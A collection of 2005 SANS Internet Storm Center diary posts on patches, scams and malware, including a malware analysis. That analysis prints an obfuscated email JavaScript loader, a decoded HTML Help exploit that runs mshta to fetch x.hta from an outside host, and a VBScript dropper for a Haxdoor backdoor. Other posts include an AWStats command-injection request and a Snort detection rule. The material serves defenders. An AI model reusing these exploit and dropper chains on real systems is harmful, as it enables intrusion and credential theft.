As a followup to the Snort vulnerability info we posted two weeks ago, a new version has been released of Snort that addresses that and some other bug fixes.  You can find Snort's announcement here.  The changes in the version are the following:

    * Fixed crash bug with -T and default logging setup first reported by 
      Zultan.
    * Corrected Win32 directory setup for new WinPCAP.

After cleaning up an infected system and doing due diligence on the people involved, I was able to track the exploit down to a group of Mexican porn site operators who apparently also take the credit cards people give them to buy porn and sell them to others.  Porn site operators aren't the most ethical bunch, but it serves as a helpful reminder.  You need to trust the merchant of whatever product you buy to not, in turn, sell your credit card or other information.  This is true regardless of it being an online merchant or some guy in a shop on the corner.  But the point is that it got me thinking about how many accounts out there that have been stolen by spyware and how much money is impacted.  I did a quick study which came up with $24 billion of US consumer money that could be levereged by someone who is not the consumer.

This is my own estimate and you can look at the methodology here.  Essentially I took the infection rate of "system monitor" spyware infections (those that have keyloggers which grab banking account and credit card information), the percentage of people who bank and shop online, and the average balance on bank accounts and credit cards and came up with over $24 billion in assets and credit that can be levereged by "hostile entities" today.  I believe this number is an underestimate.  This does not include accounts stolen via phishing, online merchants who just take the information you give them, or other social engineering attacks.

This is a draft analysis (complete with typos, bad grammar, and probably broken HTML) and comments are welcome to bambenek -at- gmail.com.

Several Microsoft service packs were released in the last day.
Here's a blurb and some links in case you missed it.

Microsoft Office 2003 SP2 Released
http://support.microsoft.com/kb/887616

Security bulletins that are associated with the service pack

MS05-023/KB890169: Vulnerabilities in Microsoft Word could lead to remote code execution
MS04-027/KB884933: Vulnerability in WordPerfect converter could allow code execution
MS04-028/KB833987: Buffer overrun in JPEG processing (GDI+) could allow code execution


Microsoft Visio 2003 SP2 Released
http://support.microsoft.com/kb/887616

Security bulletins that are associated with the service pack

MS04-028/KB833987: Buffer overrun in JPEG processing (GDI+) could allow code execution
Microsoft Outlook 2003 Junk Email Filter Update
http://support.microsoft.com/kb/904631

This update should improve your junk mail filtering accuracy.

We have a report that a new virus may be making the rounds being distributed via AOL chat.

Details are sketchy so far but we have the following thanks to Alan and Chris.

McAfee deletes the viruses but every time the user logs of and back onto the system it regenerates the batch file.

User gets a chat via AOL

       "Checkout this JPEG" with a link

After clicking the link it sends to everyone on their buddy list and creates the file

       C:\xz.bat

               Contents of the file: it is set to disable MS security, firewall

Creates 3 registry entries one of which is a service

Hkey_local_machine\Software\Microsoft\Windows\Current Version\Run

               Name :Strtax    Data: lock.exe  (Delete)

Hkey_local_machine\Software\Microsoft\Windows\Current Version\Run Services

       Name :Strtax    Data: lock.exe  (Delete)

Hkey_User\Software\Microsoft\Windows\Current Version\Run Services

       Name :Strtax    Data: lock.exe  (Delete)

After deleting those three keys and a reboot the xz.bat file stopped trying to reload itself.

If you have a copy of xz.bat or lock.exe please submit it by using the contact form at http://isc.sans.org/contact.php

The Handlers Diary of September 24th 2005 concerning IE 6 SP1 and Direct X downloads Published: 2005-09-24, Last Updated: 2005-09-24 22:37:53 UTC by Adrien de Beaupre (Version: 1) was a result of my reporting what MS describes as the "latest" "Published" security updates to Adrien. After he was kind enough to post what I thought was new MS security information, I remembered that I had once before made the mistake of interpreting Microsoft information as indicating new when in fact they were not just "Published" or not just "released". Unfortunately I didn't jump through to the digital signatures to determine the actual date's issued. So Adrien, I apologize for sending in un-vetted information that caused you and some readers problems. And I thank the Diary readers who took the time to determine the actual date's issued and point out the errors to me.

"Release date" and "Date Published" and "latest" as used by MS on their "Download Center" and as a result of going through their "Microsoft Download Notifications" email service are useless in determining currency. Take the additional steps and check the digital signature dates and research some more and you'll know if they're needed in your environment.

Reader clue Submission;

We had some posts pointing out that these were not "new" items, one submission (they requested anonymity) said it best;

"1. the ie6sp1 for non-xp sp2 systems that you say it is new..the file date&time it may well be, but the digital signature date for the file that i downloaded from that link says it was signed on May 3rd 2004 !!! so its an old one.

Maybe the file date was modified on the download server, but the  says otherwise.

2. same with the dx8 file.. this one is even older

the digital signature says it was created on August 8th 2003, even older!

please check the digital signatures in the future before posting announcements."

Thank you "anonymous", next time I'll be sure to remember that.

Exculpatory information

The Microsoft's Download Center's "Release Date" for the Diary items said;

"Internet Explorer 6 Service Pack 1 Release date 9/21/2005" and "Security Fix for DirectX 8 (KB819696) Release date 9/22/2005".

When you click the download link for the details of each Download Center item, the download "Date Published" information says;

"Internet Explorer 6 Service Pack 1 Date Published:  9/22/2005" and goes on to say:
"Quick Description:
Internet Explorer 6 is the set of core Web browsing technologies in Windows XP. These core technologies have recently been updated as part of Windows XP Service Pack 2 (SP2) with Advanced Security Technologies". And I assumed (I know ....) that MS had updated IE running on XPSP1 with IEXPSP2 security technology.... No other clueful information there.

Moving on, the "Security Fix for DirectX 8 on Windows 2000, Windows ME, Windows 98 SE, and Windows 98 (KB819696)" says "Date Published:  9/22/2005". Again, there's no other clueful information there.

On "Latest" and Published"

In addition,  when you receive the "Microsoft Download Notifications" email service (in this case September 23, 2005") and click it's links for the "latest" you get the same date items as above. The "Notifications" email is "a free weekly mailing that provides you with the latest drivers, trial software, service packs, and other downloads from the Microsoft Download Center. Listed below are downloads published in the Download Center in the past week, in the categories that you have chosen*".

In summary "Date released", "Date Published" and "latest" have nothing to do with currency.

I did contact MS about this but I'm having problems understanding where to go from here. Encyclopedia? Susan Bradley, ( ; ^ ) Susan!

Other;

"Release date" use;
"Earnings Release Date Set"
http://moneycentral.msn.com/investor/alerts/glossary.asp?TermID=2

"Date Published"
http://www.cgpublisher.com/CGOntology/CGDatePublished

Patrick Nolan ( ; ^ )

FrSIRT is reporting a zero day exploit against client side Realplayer and Helix Player.  This exploit takes advantage of a format string error which can be exploit by using specially crafted ".rp" (relpix) or ".rt" (realtext) files.  The affected versions are

Helix Player 1.0.5 Gold and prior (Linux)
RealPlayer 10.0.5 Gold and prior (Linux)

There is no known fix at this time.  http://service.real.com/help/faq/security/ has not posted information on this yet. 

Blake Hartstein from demarc.com posted the following to Bleeding-Snort yesterday which should provide
coverage for this issue: 

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
(msg:"BLEEDING-EDGE RealPlayer/Helix Player Format String Exploit"; 
flow:established,from_server; content:"
pcre:"/<image\s+[^>]*handle=[^>]*%[^>]*%/iG"; 
reference:url,milw0rm.com/id.php?id=1232; reference:bugtraq,14945; )

Stay tuned for further updates as we have them.

If you ever wondered what the handlers were all about and who we were as "real" folks, then this is something that you might enjoy.  We have a new section coming up where the handlers will each have their own web page.  Here you can find more information on the handlers themselves and on security issues and topics they feel are important.  The first handler to have theirs completed is Pedro Bueno.  So if you have time, check out the first site and meet Pedro!  He is starting a great section on malware analysis.  Go grab yourself a cup of coffee and enjoy!

AWSTATS has been a very frequent flyer as an email subject to us since the first vulnerability dealing with remote command execution was released this past January.  I went back through my old emails and since then we have gotten 77 emails all dealing with seeing this exploit in the wild, some successful, some not successful.  It has gotten more difficult to distinguish what is old and what is new.  Its all starting to blend together like all the SDbot variants running around out there (got one of those in the mail today too).  We received more reports today of the following activity taking place so keep your eyes open.

GET //awstats.pl?configdir=|echo

Just a quick note for everyone as you return to the office on Monday morning.  There have been a few reports of a new spam message that has been getting thrown out on the net over the weekend that will have security implications for some. `Pump and Dump' spam messages are email messages that appear to give the reader an insiders edge to a particular stock that will have some amazing growth.  The people involved in this spam have undoubtedly bought many shares of the stock ahead of time and will dump them after unsuspecting users push the stock price up with their purchases. This type of spam has been around for a while, and usually doesn't make it to my inbox that often.  However, since Saturday morning I have had upwards of 100 reach one of my older email addresses, and many more have been sent in to the postmaster and abuse addresses.

However, upon looking closely at the headers and looking at a very high end view, this appears to be related to exploitation of some type of cgi or php application.  After exploitation, the attacker can proxy, or otherwise relay their junk mail.  Unfortunately, I have not been able to get close enough to one of these relay machines to determine precisely what application has come under fire.

So, if you find that your company has had a large uptick in `pump and dump' spams, know that you are not the only ones.  If you find webserver logs, or better yet, an actual compromised host that was sending out this junk, then please let us know what application it is that is being exploited.

[Update - 20050926 - 2000 UTC]  --

There are several theories about what is how the spam was being sent out.  Most of them revolve around the concept of a set of zombies that were targeted at a set of domains and email addresses.  How exactly, we still don't know and hope that one of the domains that actually was exploited will look through their logs or other audit sources to help shed light on this.

With that said, there is a very interesting graph that involves the stock of the company being spammed about.  Take a look at Yahoo Finance Website for TOTG   The company in the past several days has had very small volume and little fluxuation in their prices.  If you look at the historical records it shows this as well, with the exception of  Septermber 12th.  1.2 Million in shares exchanging hands which is what pumped the stock  out of the ~40-60 cent range to the dollar range.  For future viewers, i am saving




Judging by what I am seeing, it appears that there are a lot of greedy people out there who are willing to listen to "insider information" sent to them in spam.  NOTE:  I am not saying that anything about the 2-Track Global corporation.  It is my opinion that until someone is found to do something fraudulent within their company, that they are a bunch of good guys and have become the victims of this activity.  I have forwarded copies of some of the emails to the SEC for their follow-up, and I hope that they are able to follow the money to the real criminal(s).






Scott Fendley
ISC Handler

There are two new downloads from Microsoft with publish dates of last week.

The first is Internet Explorer 6 SP1, for systems that are not XP SP2. Not a lot of detail or documentation available on this yet. It shows a publish date of 21 Sept 2005.

http://www.microsoft.com/downloads/details.aspx?FamilyID=1e1550cb-5e5d-48f5-b02b-20b602228de6&DisplayLang=en

The second is an update Security Fix for DirectX 8 on Windows 2000, Windows ME, Windows 98 SE, and Windows 98. The KB article does not appear to have been updated, but the download has a publish date of 22 Sept 2005. The original advisory was MS03-030.

http://www.microsoft.com/downloads/details.aspx?FamilyID=49552d6a-4a62-48ba-a2ac-0b237cd5f732&DisplayLang=en

Cheers,
Adrien
SANS Internet Storm Center Handler of the day

Now I am no expert on zen. I don't know anyone who is, and I don't play a zen master on TV. I do have some experience with data backups, and quite a bit attempting to do restores. Note the key word attempt. A number of times I have asked clients for their most recent backup tapes, only to realize that they are blank, too old, the tapes are damaged, the tapes are 30 KM away, or they did not back up the data they intended to.

What is zen anyway? One way to think of zen is that it is an approach to the journey of life. You become more aware of the journey as it happens, as well as the things and people around you. Zen is about those things that are within you, and interacting with your environment.

So how does zen have anything to do with data backups? Backups are one of those things we really know we should do. I have often said that there are only three rules to using computers. The first is to plan on doing backups. The second is actually doing the backups, and the third is to test those pesky backups to make sure they actually worked. It is funny that number three is the step we seem to miss out on the most. Not to pick on the number three, it should not feel left out, almost as many people fail to do number one or number two.

One of the interesting things about data is that it is actually constantly moving. It doesn't just lie there, you can only take snapshots in time. A good analogy is that data can be like water. The picture of how it looks at one point might not relate at all to how it looks later. You can take great care to contain the water, but it can also go stale, or the storage container can go bad as well. Having multiple copies of the data doesn't guarantee that they are the same at all. In approaching zen backup guru-hood you are unfortunately only as good as the last known good backup that you can restore.

What is data? Well one way of looking at it is all that stuff you would rather not lose. All that stuff that should be backed up, that is your data grasshopper. One of the funny (well not really) things about data is the more of it you have lost over time, the better you get at backups! You can learn wisdom through data loss grasshopper.   

Lets face it, working with computers can be interesting, fun, infuriating, frustrating, and educational. All at the same time. No matter how you feel about them, most of us keep rather important stuff on our computers. Think carefully and approach awareness of the value of the data on computers, both those at home and those at work. Realize the tragedy of complete loss of that data, let it permeate your being. Sense the power of a proper tested backup, the joy of being able to restore that data. Meditate and happily hum along with your favorite backup software and hardware. Place you backup media with reverence in its place of safety.

If you fail in these steps along the path to zen backups, have no worry. Really, was the data truly yours to begin with? If there is no sign of that data, who is to say it existed in the first place?

A reader mentioned that this story reminded him of a site he read a while back:
http://taobackup.com/
(Thanks Dan!)

Cheers,
Adrien de Beaupré
Handler of the day
http://www.cinnabar.ca/



 

This is the BEST news I have heard all week.
I knew this was coming but did not realize they were this close to implementation.
US-CERT, the U.S. Computer Emergency Readiness Team, will begin issuing uniform names for computer viruses, worms and other malicious code next month, as part of a program called the Common Malware Enumeration initiative.
http://www.eweek.com/article2/0,1895,1862266,00.asp
To malware fighters, researchers, and many others this will be a very good thing.
There will be some issues but it will make my job easier.

An exploit for the recently patched IDN bug in mozilla's firefox is circulating.
http://www.informationweek.com/story/showArticle.jhtml?articleID=171200310

Cisco released an update to the sept 7th vulnerability release with regards to Cisco IOS Firewall Authentication Proxy for FTP and Telnet Sessions Buffer Overflow. This one could be a MAJOR issue for people runningn Cisco IOS firewall with authentication proxies for ftp and telnet. However so far I have not met anyone who is doing that.
 
http://www.cisco.com/en/US/products/products_security_advisory09186a00805117cb.shtml#software
Revision 1.1
2005-September-22
Added 12.2SG, 12.2SEC, and 12.2SXF releases to Software Version and Fixes

First while this affected the news portion of their site FinCEN was NOT hacked here is a portion of their statement.

The “FinCEN QuikNews” system, a subscriber-based e-mail service that is part of the Financial Crimes Enforcement Network’s public website and is hosted externally, appears to have been compromised this morning. We are investigating this incident. This system resides outside FinCEN’s security perimeter and is not connected to any other FinCEN systems. Bank Secrecy Act data, and all other sensitive information maintained by FinCEN, was in no way, shape or form compromised by this incident.

To read the rest goto http://www.fincen.gov/quiknews_statement.pdf

Please welcome Mohammed Haron to our volunteer handler team.

Mohammed is currently working for Intel Corp. in Penang, Malaysia. His duties at Intel include a wide array of security responsibilities from IDS to Forensics. He holds a GIAC GSEC and GCIA certification, and has been a local mentor for both.

His interest in security got jump-started by a group of Brazilian hackers defacing his perosnal web site (gr33tz to P3dr0).

Yesterday, Tom Liston posted his latest Follow the Bouncing Malware.  In it, he posed a question for extra credit, namely:

"Those of you with taped, horn-rimmed glasses who were in the AV club in Jr. High will note that the numbers assigned to o(0) look strangely familiar.  [They were 4d5a] They're the hex equivalents of the "magic values" that begin every program on the PC (extra-credit: anyone know what they stand for?)."

We had several readers point out the answer, but the first was Frank Knobbe:

"Actually, it is every MSDOS program. Every Portable Executable (PE) file starts with a header. The first two bytes is a 'magic' that identifies the file as an MSDOS executable. The magic is 0x5A4D which is MZ in ASCII. MZ are the initials of Mark Zbikowski, one of the original architects of MS-DOS. :)"

Tom described this as the ultimate in vanity-license-plate equivalents for geeks.  Indeed it is.  And, I might point out that the file encryption solution built into modern Windows systems is called….

Signing out—

Edward Frank Skoudis

Intelguardians, www.intelguardians.com

The latest version of Firefox is available, including some important security fixes.  Get it here.  This one fixes a few big security issues, including MFSA 2005-57, IDN heap overrun using soft-hyphens.

The trend of putting trojaned downloads on software distribution sites continues unabated.  A Korean site, officially **unaffiliated** with the Mozilla, Thunderbird, and Firefox development teams, distributes a Korean version of Mozilla Suite 1.7.6 and Thunderbird 1.0.2.  Turns out, a couple of days ago, evil versions of Mozilla and Thunderbird for Linux appeared on this site.  When installed, they would infect ELF binaries in /bin.  The malware included a backdoor, although it had little spreading potential.  Still, that's why, when you upgrade, make sure you download from a couple of mirrors and check that hash!  Md5sum and SHA-1 are your friend.  And, if you are really paranoid, RIPEMD-160 is a good acquaintance to have.

Update: According to information we've received (thanks, Roel!), Korean versions of Mozilla and Thunderbird distributed through **official** Mozilla FTP sites were also infected.  So, if you use Korean Mozilla or Thunderbird, and downloaded the latest versions of thunderbird or mozilla, you may have been compromised.  I suggest a good file integrity check, and perhaps a reinstall of your operating system and apps.  Thanks again, Roel, for the clarification.

A couple of diligent readers pointed us to this initial report of a worm attacking Windows XP boxes, spreading only through Wi-fi, not the Internet.  While it hasn't been confirmed (nothing is confirmed until we get packets or code!), it's an intriguing possibility.  The first I heard about this concept was several years ago, over Thai food and beers with a fellow handler, whom I won't name.  Okay… his name is an anagram of "A JUG HIS WORTH."  Any way, Mr. JUG mentioned the possibility of a worm that attacks via wireless and leaves the Internet alone for a while.  That way, it would miss our detection mechanisms for a while, as it spreads in airports, coffee houses, and urban centers.  Perhaps we are facing such a thing now, or perhaps not.  Something wicked might be brewing in Newark, New Jersey.

Got this message from some fine folks at DHS:

"In responding to recent natural disasters and state of emergencies due to Hurricane Katrina, and now Rita, the DHS US-CERT in collaboration with the Control Systems Security Center (CSSC) has released a Hurricane Katrina Control System Assistance Informational Paper. The US CERT Control Systems Security Center (CSSC) has placed this informational bulletin here.  Please go to this site and click on the link under reports for "Hurricane Katrina Control Systems Assistance (PDF)."

This paper describes how to get physical and electronic operations back on-line in a time of crisis.

Sadly, Hurricane Rita charity scams have already started.  Several handlers at the ISC, including Tom Liston and Johannes Ullrich, are working with others, such as US-CERT, on coming up with lists of scam sites. 

Watch the diary over the next few days for such a list.  Also, if you find a bogus-looking "charity", feel free to report it to us at handlers-rita@sans.org or to US-CERT at soc@us-cert.gov.

Also, you may want to check out our collaborative reporting system to help sort out bogus sites posing as hurricane charities.

Update
Due to an initiative born from the 'mwp' list, a number of domain name registrars, anti-phishing, anti-spam groups and national CERTS are working together to have these sites closed down as fast as possible.

The RedCross  has set up a special email address for reporting suspicious sites fraudalert@usa.redcross.org

Also, here is a current list of the RedCross's official donation sites:


http://www.redcross.org/sponsors/donationsites/official_donation_sites.html

You can of course just go to
http://www.redcross.org as the starting page if you wish to give to the
American Red Cross. That is probably the safest method.

The Spy Who Bugged Me

Cigarette smoke hung around the lampshade like a bad memory and the watery light from the low wattage bulb made the cheap coffeehouse tabletop look somehow cheaper.  It was late afternoon and, as I relaxed back into the leather of the booth's seat and took a long, slow draw on my double-mocha latte with extra whipped cream, I gave the little barista hottie my most smoldering "come hither" look.  No one was more surprised than me when she actually came hither.

"Look, Mister," she began, snapping her gum seductively; "you can't just sit here all afternoon nursing one lousy cup of coffee.  You have to buy something."

She wanted me.  It was obvious.

And why not?  All women want me, for I am Sixpack... Joe Sixpack, Agent 008.

[Insert long, surreal opening credit sequence, with scantily clad models prancing about to '60s music, while seductively caressing handguns.]

[Nope... nothin' Freudian about that...]

Careful not to blow my cover story (a middle-aged, balding, overweight insurance salesman on a junket to the home-office in Duluth, MN for training) I dialed back on "suave and debonair" to better fit the part:

"Uh... Look, uh... I'm from out of town and my wife only gave me so much money to spend each day... and she'll be really mad if I..."

"Buy something or get out.  You can't just come in here and sit at our tables and use the free wireless all afternoon.  You have to buy something."

"Look, this isn't even my laptop.  I borrowed it from my boss.  He told me that I..."

"Are you going to buy something, or do I have to call the cops?"

"Ok.  Fine.  I'll order something.  What's the cheapest thing you sell?"

Both the way she rolls her eyes, and her long, drawn-out sigh scream "I want you."  She can barely contain herself as she takes my order for a kid-sized fruit punch.  I sense a shiver of ecstasy run through her body when, as she is walking back to the counter, I add "Shaken, not stirred."

I return my attention to the matter at hand.  The evil minions of SPECTRE have hidden several explosive devices within a grid conveniently displayed on the "borrowed" laptop's screen.  It is my mission to find out where they are and mark them.  It is a delicate task, but Joe Sixpack, Agent 008, is up to the challenge.

Just as I was poised to place a flag marking the position of another of the explosive devices, a small voice speaks to me.  

Every secret agent counted on that small, still voice inside to warn them when something wasn't right... when danger lurked nearby.  But this wasn't that voice.  This was an inane, stupidly-chipper voice that said "You've got mail!" in a tone normally reserved for saying things like "You've won a Nobel Prize."

"Hey, Mr. Trump, you've got mail," said the sultry coffee-serving wench, undressing me with her eyes as she placed my cup of DomJuicyJuice on the table next to me.  "I don't suppose you'll be ordering anything else..."

"Only later tonight, when I have you in my bed," I think to myself while quickly saying "No."

At the bottom of the screen, in the System Tray, there is a little red envelope flashing at me: obviously, a new, Top Secret, Eyes-Only message.  I glance around, acting, for all who might be watching, exactly like some guy who was about to open the email program that his boss accidentally left running on his borrowed laptop.

The place is empty, except for me and my hunka-hunka-burnin' barista love, but you can never be too careful.  A double-click on the envelope brings up the Ultra Top Secret Messaging Interface, cleverly disguised as an outdated version of Outlook Express.

At the top of the screen, I see the new message.  In bold, the subject reads: "Notification of e-gold account update."  

I clear my throat, a few dozen times, and casually say "Yep... those e-gold folks.  What a pain they are... constantly after me about updating my account information.  It just never ends..."

Obviously left speechless in the presence of such a worldly yet attractive member of the opposite sex, my scalding-hot coffee-girl can only make a loud, yet feminine, snorting noise.

"I thought you said that the laptop belonged to your boss."

"Did I?  Uh... no.  No.  It's mine.  All mine.  One of several that I own, in fact," I stammer.  As if to prove my point, I double-click on the email, opening it.

The email itself is pretty much of a disappointment-no text, no nothing.  It was probably just some sort of mistake.  For a moment, I think I see some strange flashing of windows, but I'm suddenly distracted as my Caffeine-Queen speaks:

"Why did you say that?" she asks.

"Say what?"

"You know... the stuff about e-gold and owning a bunch of laptops.  Why did you say that?  Are you trying to impress me or something?  Do you think that you can walk your bland chubby middle-aged self in here, order the cheapest thing on the menu so you can use our wireless, and then toss out some bull about owning gold and laptops and impress me?"

"I was only trying to make conversation..." I explain.

"Well don't," she says, looking suddenly like some evil arch-villain.  "I don't expect you to talk, Mr. Bland... I expect you to buy."

From Russia With Love

While Agent 008 might have thought the email that he opened was a "disappointment," like any good spy thriller, there was a lot more going on behind the scenes.  While there wasn't any text to the email, it did deliver a top secret message.

Hidden within the email was the following JavaScript:

<html><script>var a='
 <edited>';
var e=256,x=0,o="",t=new Array(4113),s="Ñ<style>#Ñx2<edited>";
function g(s,f){if(s.length<=x)return e;
else{if(f){return s.charAt(x++);}else{return a.indexOf(s.charAt(x++));
}}}function d(){var i,j,k,c,r=4078,l=0,os="",ar,ic=0;ar=new Array();
for(i=0;i<4078;i++)t[i]=" ";for(;;){if(((l>>=1)&256)==0)
{if((c=g(s,0))==e)break;l=c|65280;}if(l&1){if((c=g(s,1))==e)break;
os+=c;t[r++]=c;r&=4095;}else{if((i=g(s,0))==e)break;
if((j=g(s,0))==e)break;i|=((j&240)<<4);j=(j&15)+2;
for(k=0;k<=j;k++){c=t[(i+k)&4095];os+=c;t[r++]=c;r&=4095;}}
if(os.length>80){ar[ic++]=os;os="";}}o=ar.join("")+os;}d();
document.writeln(o);document.close();
</script></head><body
onLoad='window.status="<edited>                                 ."'>
</body></html>

Note: several of the character strings have been <edited> as indicated.

Several FTBMs ago, kindly ol' doctor Tom told you how to deal with encoded JavaScript like this.  I showed you a very Zen-like technique that used the script itself to do the decoding for you.  Well... forget it.  I now have an even easier way to show you, so sit back and take notes as Dr. Tom shows you how to mess up a malware author's day.

Doctor! No!

The technique I described before used a FileSystemObject to create a text file that contained the dumped output of the obfuscated JavaScript.  Doing that was rather a pain, required that you edit the JavaScript in several places and... well, let's just stick with "it was a pain."  Here's a much easier way.

Look through the JavaScript and find where it is that they're actually dumping the results of their decoding function back into the document.  It'll most likely be a call to either document.write() or document.writeln().  What is happening is that the JavaScript is actually writing the new, decoded HTML / JavaScript back into the live document so it can be interpreted by your browser's parser on the fly.  What we want to do is find a way to short-circuit that parsing and allow the results to be displayed rather than interpreted by the browser.  The easiest way to do that is to have the decoded output displayed by an HTML construct called a <textarea>.

In the above code, this can be accomplished by putting the following before the call to document.writeln(o):

document.write("<textarea cols=100 rows=100>");

and the following immediately after:

document.write("</textarea>");

You then fire off the resulting JavaScript in a browser, and it will display the code that it would've normally interpreted.  And just-like-that, someone's hard work to obfuscate their code falls apart.  

Note: Never, ever, ever ,ever, do this on a "live" production machine.  Only ever play with malware on an isolated lab machine that you're ready, willing, and able to reformat at the drop of a hat.  Remember: if you mess up, I'll send sharks with frickin' laser beams on their heads over to get you.

Doing that, we find that the obfuscated stuff is actually:

<style>#x2,#x3{position:absolute;left:-1000;}</style>
<OBJECT id=x2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<param name="Scrollbars" value="true">
<PARAM NAME="Item1"
VALUE="command;ms-its:icwdial.chm::/icw_overview.htm">
</OBJECT>
<script>x2.HHClick();</script>
<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<PARAM NAME="Item1" VALUE="command;javascript:document.links[0].href='
EXEC=,mshta,http://www.date4me2.com/images/x.hta  CHM=ieshared.chm
FILE=app_install.htm'%3Bdocument.links[0].click();">
</OBJECT>
<script>setTimeout('x3.HHClick();',1000);setTimeout('window.close();',1200);
</script>
</html>

This is an exploit aimed at a vulnerability in HTML Help (patched by MS05-001) that can be used to execute arbitrary code.  In this case, it attempts to download and launch another HTML file called x.hta.

License To Kill

The file x.hta looks like a very much larger version of the original email message, re-using much of the same code found at the end of the JavaScript, and replacing only the information in the variables.  Decoding is done in the same manner as before, and results in the following:

<HTML><HEAD>
<TITLE>Microsoft Update Wizard</TITLE>
<HTA:APPLICATION id=MSUpdate
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<BODY><NOSCRIPT>To display this page you need a browser with JavaScript support.</NOSCRIPT>
<SCRIPT language="VBScript">
self.MoveTo 6000,6000
Dim IESetup
Dim o(788)
o(0)="4d5a00<edited>"
o(1)="000040<edited>"
.
.
.
783 lines removed...
.
.
.
o(786)="e8564e<edited>"
o(787)="5a6f37<edited>"
set wshProcEnv=MSplay.environment("process")
f=wshProcEnv("TEMP") + "msdtc.exe"
set IESetup=MSmedia.CreateTextFile(f, TRUE)
For j=0 To 787
o_Size=Len(o(j))
For k=1 To (o_Size-1) Step 2
Exe_Byte=Mid(o(j),k,2)
Exe_Byte="&H"+Exe_Byte
IESetup.Write(Chr(Exe_Byte))
Next
Next
IESetup.Close()
MSplay.Run(f),1,TRUE
MSmedia.DeleteFile(f)
self.Close
</SCRIPT>
</BODY></HTML>
                      
Those of you with taped, horn-rimmed glasses who were in the AV club in Jr. High will note that the numbers assigned to o(0) look strangely familiar.  They're the hex equivalents of the "magic values" that begin every program on the PC (extra-credit: anyone know what they stand for?).

Yep, the decoded JavaScript is simply building a Win32 executable out of whole cloth... ie. it is simply writing out an executable binary based on hex values stored into an array in the source code.  If we remove these lines (which launch and then delete the file...):

MSplay.Run(f),1,TRUE
MSmedia.DeleteFile(f)

and load the HTML in a browser, we end up with the file "msdtc.exe" wherever we have "TEMP" assigned.

The file msdtc.exe is a 50,425 byte long FSG-packed Win32 executable that is chock full o'Evil.  (Note: that is evil with a capital "E").  It is recognized, by several antivirus products, as Haxdoor.DW, and categorized as a Trojan/Backdoor.

A View To A Kill

Launching msdtc.exe on a test box results in no visible action (beyond a blinking drive light... hmmm...).  Monitoring the action of the software tells us that it installs the following files:

C:\WINDOWS\system32\avpx32.dll
C:\WINDOWS\system32\qz.dll
C:\WINDOWS\system32\avpx64.sys
C:\WINDOWS\system32\qz.sys
C:\WINDOWS\system32\avpx32.sys
C:\WINDOWS\system32\qy.sys
C:\WINDOWS\System32\ps.a3d

it also appeared to copy the Windows SAM information to a file called SSL.

The funny thing is, when I went to look for those files on my test machine, they weren't there.  Huh, I thought... I *know* that they were created...

Hmmm... a mystery.

The ".sys" ending of some of those files was my first clue.  Files with the .sys extension are generally drivers on Windows, and so it would appear that what we have here is (rather than a failure to communicate) a Win32 rootkit-like entity that is hiding the existence of these files.

Sure enough, rebooting the system using a Linux bootable CD, I can see the files sitting in the system32 directory... If I boot normally under Windows, they're "not there."

Cool.

Very, very cool.

(Note: Please don't take that the wrong way.  When it comes to the folks who write things like this... their morals go so far beyond "twisted" that perhaps they're "sprained."  In spite of that, you have to admit... this is pretty darned cool stuff...)

For Your Eyes Only

In any case, this little bugger has more than a few tricks up its sleeve:

It installs itself as two "LegacyDrivers" called "AVPX TCP" (avpx32.sys) and "AVPX64 TCP" (avpx64.sys).  From this vantage point, it controls what data system calls (such as those used to enumerate files within the file system and enumerate keys within the registry) will and will not be allowed to return.  It hides both the files that it creates and the registry keys that are used to launch and control them.  It isn't "directory specific" when it masks files: for instance, if you use notepad to create a file on the desktop called avpx32.dll, the file disappears.  Even though the file doesn't show up in a directory listing, trying to create another file with the same name results in a "file exists, replace?" prompt.

It does this by having avpx32.dll injected into essentially every running process.

It turns off memory write protection in the registry, allowing it free reign to overwrite portions of memory and it installs registry values under the HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot key to force itself to run even in Safe Mode.

Yes... you read that correctly: even in Safe Mode.

It sets up a listening process on TCP ports 7080, 8008, and 16661.  It does not appear to hide these open ports, or at least it didn't do a very good job of hiding them.  With the correct "logon sequence," connections to these backdoor ports will allow a remote "user" to:

Download and execute files
Steal passwords stored in Protected Storage
Steal any cached passwords
Steal dialup connection information
Log keystrokes

If that wasn't Evil enough, it steals information from Internet Explorer's URL in strings that contain: ebay.com, paypal.c and e-gold.c

It also takes the now passé step of blocking access to antivirus vendor websites.

And finally, as if to prove that Evil has no bounds, if you happen to actually *have* an e-gold account (remember, this all started off as an e-gold related spam...) it tries to steal even *more* information about you by logging onto e-gold using the information that it found on your machine.

Somewhere out there, there's a seriously Type-A malware author that should be switching to decaf...

-Tom Liston - Intelguardians Network Intelligence, LLC

If your users are accessing the european versions of the more popular search engines, chances are you have come across a file named "s_ta_ts.js" recently. The file contains about 2000 bytes of triple-encoded JavaScript, recognized by virus vendors variably as "JS_WONKA.A" or "Java/Dldr.Movie.A".

If you're curious, you can get your copy off hxxp://othersearch_dot_info/s_ta_ts.js or hxxp://bizfree_dot_org/s_ta_ts.js, but dont complain if you get burnt playing with fire.  For the sensibly less curious, the decoded version is shown below, as an image so as not to scare your Antivirus that might nor might not have coverage for this sort of thing.



The file doesn't do much (yet), it invokes Shockwave Flash in an attempt to get a pop-up past the pop-up blocker that most browsers nowadays have. But that's only one half of the story.

The origin of these goodies seem to be pages that have been successfully spammed into various search engines over the past month or so. Users searching, as an example, for completely benign things like "writing business letters" can get a search result that ranks two or three of these fake/spammed pages on top.  Clicking on any of the search results then leads the user to the never-never land of pop-ups, and, yes, his/her personal copy of s_ta_ts.js.

